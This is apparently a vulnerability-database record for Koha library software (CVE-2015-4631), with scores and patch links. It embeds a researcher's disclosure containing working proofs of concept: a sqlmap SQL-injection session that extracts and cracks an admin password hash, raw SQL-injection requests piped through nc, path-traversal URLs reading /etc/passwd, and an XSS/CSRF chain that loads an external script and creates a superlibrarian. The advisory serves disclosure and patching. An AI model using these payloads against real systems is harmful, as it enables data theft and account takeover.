ID

VAR-201810-0024


CVE

CVE-2015-4631


TITLE

Koha Cross-Site Scripting Vulnerability

Trust: 1.4

sources: IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d // CNVD: CNVD-2015-05200 // CNNVD: CNNVD-201512-696

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure  =============================================================================================== title: Koha Unauthenticated SQL injection product:         Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website:         http://www.koha-community.org/ found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact:         cst@sba-research.org References: http://koha-community.org/security-release-koha-3-20-1/         http://koha-community.org/security-release-koha-3-18-8/         http://koha-community.org/security-release-koha-3-16-12/         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416         http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418         ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 =============================================================================================== ========================= 1. Mutiple SQL Injections ========================= + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerability: -------------- The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 # ################################################################################################## # # PoC:     # # ################################################################################################## # 1. Inspect Koha database schema    Have a look at how to query the database for superlibrarian users:    http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians    So basically we we need to execute some SQL statement like this:    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; 2. Query the database with sqlmap    So let's fire up sqlmap with the --sql-shell parameter and input the query:    root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4          _     ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}    |_ -| . | |     | .'| . |    |___|_  |_|_|_|_|__,|  _|          |_|           |_|   http://sqlmap.org    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program    [*] starting at 09:20:07    [09:20:07] [INFO] testing connection to the target URL    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:    ---    Parameter: number (GET)        Type: AND/OR time-based blind        Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)        Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)    ---    [09:20:09] [INFO] testing MySQL    [09:20:09] [INFO] confirming MySQL    [09:20:09] [INFO] the back-end DBMS is MySQL    web server operating system: Linux Debian    web application technology: Apache 2.4.10    back-end DBMS: MySQL >= 5.0.0    [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;    [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'    [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind    [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                          [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors     admin    [09:21:46] [INFO] retrieved: $2a$08$taQ    [09:23:33] [ERROR] invalid character detected. retrying..    [09:23:33] [WARNING] increasing time delay to 5 seconds     afOgEEhU    [09:25:10] [ERROR] invalid character detected. retrying..    [09:25:10] [WARNING] increasing time delay to 6 seconds     t/gW    [09:26:13] [ERROR] invalid character detected. retrying..    [09:26:13] [WARNING] increasing time delay to 7 seconds     TOmqnYe1Y6ZNxCENa    [09:29:57] [ERROR] invalid character detected. retrying..    [09:29:57] [WARNING] increasing time delay to 8 seconds     2.ONk2eZhnuEw5z9OjjxS    [09:35:08] [ERROR] invalid character detected. retrying..    [09:35:08] [WARNING] increasing time delay to 9 seconds     select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:        'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' 3. Feed john the ripper and be lucky    root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass    root@kali:/home/wicked# john ./admin-pass     Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])    admin            (?)    guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate    Use the "--show" option to display all of the cracked passwords reliably    root@kali:/home/wicked# john ./admin-pass --show    ?:admin    1 password hash cracked, 0 left 4. If the webserver is misconfigured, read & write access to the filesystem may be possible. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 # ################################################################################################## # # PoC:     # # ################################################################################################## # ==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002 ==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002 ==================================================================== You will notice different output in every second request, demonstrating the evaluation of the payload. # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 3. Path Traversal (CVE-2015-4633) ================================= Vulnerability ------------- The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. References ---------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 # ################################################################################################## # # PoC:     # # ################################################################################################## # The following input is used to print out /etc/passwd: /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd # ################################################################################################## # # PoC End     # # ################################################################################################## # ================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site  forgery (XSRF) attacks.   The attack can be performed by: - through a compromised user account.   References ---------------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 # ################################################################################################## # # PoC / Attack Scenario:     # # ################################################################################################## # Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link: --> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0 Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens  --> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example: Create new user: ----------------------- --> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1 Give the new user superlibririan permission: ---------------------------------------------------------- --> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists. # ################################################################################################## # # PoC / Attack Scenario End     # # ################################################################################################## #

Trust: 5.58

sources: NVD: CVE-2015-4631 // JVNDB: JVNDB-2015-008219 // CNVD: CNVD-2015-05198 // CNVD: CNVD-2015-05201 // CNVD: CNVD-2015-05199 // CNVD: CNVD-2015-05200 // CNVD: CNVD-2015-05197 // BID: 75426 // IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d // IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d // IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d // IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d // IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d // PACKETSTORM: 132458

IOT TAXONOMY

category:['ICS']sub_category: -

Trust: 4.0

sources: IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d // IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d // IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d // IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d // IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d // CNVD: CNVD-2015-05198 // CNVD: CNVD-2015-05201 // CNVD: CNVD-2015-05199 // CNVD: CNVD-2015-05200 // CNVD: CNVD-2015-05197

AFFECTED PRODUCTS

vendor:kohamodel:library software community kohascope: - version: -

Trust: 3.0

vendor:kohamodel:library software communityscope:eqversion:*

Trust: 1.0

vendor:kohamodel: - scope:eqversion:*

Trust: 1.0

vendor:kohamodel:kohascope:gteversion:3.16.00

Trust: 1.0

vendor:kohamodel:kohascope:ltversion:3.18.8

Trust: 1.0

vendor:kohamodel:kohascope:gteversion:3.20.00

Trust: 1.0

vendor:kohamodel:kohascope:gteversion:3.14.00

Trust: 1.0

vendor:kohamodel:kohascope:ltversion:3.14.16

Trust: 1.0

vendor:kohamodel:kohascope:ltversion:3.16.12

Trust: 1.0

vendor:kohamodel:kohascope:gteversion:3.18.0

Trust: 1.0

vendor:kohamodel:kohascope:ltversion:3.20.1

Trust: 1.0

vendor:kohamodel:kohascope:ltversion:3.20.x

Trust: 0.8

vendor:kohamodel:kohascope:ltversion:3.16.x

Trust: 0.8

vendor:kohamodel:kohascope:eqversion:3.16.12

Trust: 0.8

vendor:kohamodel:kohascope:eqversion:3.14.16

Trust: 0.8

vendor:kohamodel:kohascope:ltversion:3.14.x

Trust: 0.8

vendor:kohamodel:kohascope:eqversion:3.20.1

Trust: 0.8

vendor:kohamodel:kohascope:ltversion:3.18.x

Trust: 0.8

vendor:kohamodel:kohascope:eqversion:3.18.08

Trust: 0.8

vendor:kohamodel:kohascope:eqversion:3.14.05

Trust: 0.6

vendor:kohamodel:kohascope:eqversion:3.14.06

Trust: 0.6

vendor:kohamodel:kohascope:eqversion:3.14.00

Trust: 0.6

vendor:kohamodel:kohascope:eqversion:3.14.03

Trust: 0.6

vendor:kohamodel:kohascope:eqversion:3.14.04

Trust: 0.6

vendor:kohamodel:kohascope:eqversion:3.14.01

Trust: 0.6

vendor:kohamodel:kohascope:eqversion:3.14.02

Trust: 0.6

vendor:kohamodel:library software community kohascope:eqversion:3.20

Trust: 0.3

vendor:kohamodel:library software community kohascope:eqversion:3.18.7

Trust: 0.3

vendor:kohamodel:library software community kohascope:eqversion:3.18

Trust: 0.3

vendor:kohamodel:library software community kohascope:eqversion:3.16.11

Trust: 0.3

vendor:kohamodel:library software community kohascope:eqversion:3.16

Trust: 0.3

vendor:kohamodel:library software community kohascope:neversion:3.20.1

Trust: 0.3

vendor:kohamodel:library software community kohascope:neversion:3.18.8

Trust: 0.3

vendor:kohamodel:library software community kohascope:neversion:3.16.12

Trust: 0.3

sources: IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d // IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d // IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d // IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d // IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d // CNVD: CNVD-2015-05198 // CNVD: CNVD-2015-05201 // CNVD: CNVD-2015-05199 // CNVD: CNVD-2015-05200 // CNVD: CNVD-2015-05197 // BID: 75426 // JVNDB: JVNDB-2015-008219 // CNNVD: CNNVD-201512-696 // NVD: CVE-2015-4631

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-4631
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-4631
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2015-05198
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2015-05201
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2015-05199
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2015-05200
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2015-05197
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201512-696
value: LOW

Trust: 0.6

IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d
value: LOW

Trust: 0.2

IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d
value: LOW

Trust: 0.2

IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d
value: LOW

Trust: 0.2

IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d
value: LOW

Trust: 0.2

IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d
value: LOW

Trust: 0.2

nvd@nist.gov: CVE-2015-4631
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2015-05198
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2015-05201
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2015-05199
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2015-05200
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2015-05197
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.9 [IVD]

Trust: 0.2

IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.9 [IVD]

Trust: 0.2

IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.9 [IVD]

Trust: 0.2

IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.9 [IVD]

Trust: 0.2

IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.9 [IVD]

Trust: 0.2

nvd@nist.gov: CVE-2015-4631
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d // IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d // IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d // IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d // IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d // CNVD: CNVD-2015-05198 // CNVD: CNVD-2015-05201 // CNVD: CNVD-2015-05199 // CNVD: CNVD-2015-05200 // CNVD: CNVD-2015-05197 // JVNDB: JVNDB-2015-008219 // CNNVD: CNNVD-201512-696 // NVD: CVE-2015-4631

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.8

sources: JVNDB: JVNDB-2015-008219 // NVD: CVE-2015-4631

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 132458 // CNNVD: CNNVD-201512-696

TYPE

Cross-site scripting

Trust: 1.0

sources: IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d // IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d // IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d // IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d // IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-008219

PATCH

title:Bug 14416url:https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416

Trust: 0.8

title:Bug 14418url:https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

Trust: 0.8

title:Bug 14423url:https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

Trust: 0.8

title:Security Release - Koha 3.20.1url:https://koha-community.org/security-release-koha-3-20-1/

Trust: 0.8

title:Koha 3.14.16 releasedurl:https://koha-community.org/koha-3-14-16-released/

Trust: 0.8

title:Security Release - Koha 3.16.12url:https://koha-community.org/security-release-koha-3-16-12/

Trust: 0.8

title:Security Release - Koha 3.18.8url:https://koha-community.org/security-release-koha-3-18-8/

Trust: 0.8

title:Koha directory traversal vulnerability patchurl:https://www.cnvd.org.cn/patchInfo/show/62257

Trust: 0.6

title:Patch for Koha cross-site request forgery vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/62260

Trust: 0.6

title:Koha HTML Injection Vulnerability Patchurl:https://www.cnvd.org.cn/patchInfo/show/62258

Trust: 0.6

title:Patch for Koha Cross-Site Scripting Vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/62259

Trust: 0.6

title:Patch for Koha SQL Injection Vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/62255

Trust: 0.6

sources: CNVD: CNVD-2015-05198 // CNVD: CNVD-2015-05201 // CNVD: CNVD-2015-05199 // CNVD: CNVD-2015-05200 // CNVD: CNVD-2015-05197 // JVNDB: JVNDB-2015-008219

EXTERNAL IDS

db:BIDid:75426

Trust: 3.9

db:NVDid:CVE-2015-4631

Trust: 3.8

db:PACKETSTORMid:132458

Trust: 1.7

db:CNNVDid:CNNVD-201512-696

Trust: 1.6

db:EXPLOIT-DBid:37389

Trust: 1.6

db:CNVDid:CNVD-2015-05197

Trust: 0.8

db:CNVDid:CNVD-2015-05198

Trust: 0.8

db:CNVDid:CNVD-2015-05199

Trust: 0.8

db:CNVDid:CNVD-2015-05200

Trust: 0.8

db:CNVDid:CNVD-2015-05201

Trust: 0.8

db:JVNDBid:JVNDB-2015-008219

Trust: 0.8

db:IVDid:70A561B4-1E6E-11E6-ABEF-000C29C66E3D

Trust: 0.2

db:IVDid:72631F14-1E6E-11E6-ABEF-000C29C66E3D

Trust: 0.2

db:IVDid:747C9C94-1E6E-11E6-ABEF-000C29C66E3D

Trust: 0.2

db:IVDid:182E31FA-1E6E-11E6-ABEF-000C29C66E3D

Trust: 0.2

db:IVDid:1AD25DDC-1E6E-11E6-ABEF-000C29C66E3D

Trust: 0.2

sources: IVD: 70a561b4-1e6e-11e6-abef-000c29c66e3d // IVD: 72631f14-1e6e-11e6-abef-000c29c66e3d // IVD: 747c9c94-1e6e-11e6-abef-000c29c66e3d // IVD: 182e31fa-1e6e-11e6-abef-000c29c66e3d // IVD: 1ad25ddc-1e6e-11e6-abef-000c29c66e3d // CNVD: CNVD-2015-05198 // CNVD: CNVD-2015-05201 // CNVD: CNVD-2015-05199 // CNVD: CNVD-2015-05200 // CNVD: CNVD-2015-05197 // BID: 75426 // JVNDB: JVNDB-2015-008219 // PACKETSTORM: 132458 // CNNVD: CNNVD-201512-696 // NVD: CVE-2015-4631

REFERENCES

url:http://www.securityfocus.com/bid/75426

Trust: 3.6

url:https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

Trust: 2.0

url:https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

Trust: 2.0

url:https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416

Trust: 2.0

url:https://koha-community.org/security-release-koha-3-16-12/

Trust: 1.7

url:https://koha-community.org/security-release-koha-3-18-8/

Trust: 1.7

url:https://koha-community.org/security-release-koha-3-20-1/

Trust: 1.7

url:https://koha-community.org/koha-3-14-16-released/

Trust: 1.6

url:https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html

Trust: 1.6

url:https://seclists.org/fulldisclosure/2015/jun/80

Trust: 1.6

url:https://www.exploit-db.com/exploits/37389/

Trust: 1.6

url:https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2015-4631

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4631

Trust: 0.8

url:http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

Trust: 0.4

url:http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408

Trust: 0.4

url:http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412

Trust: 0.4

url:http://koha-community.org/

Trust: 0.3

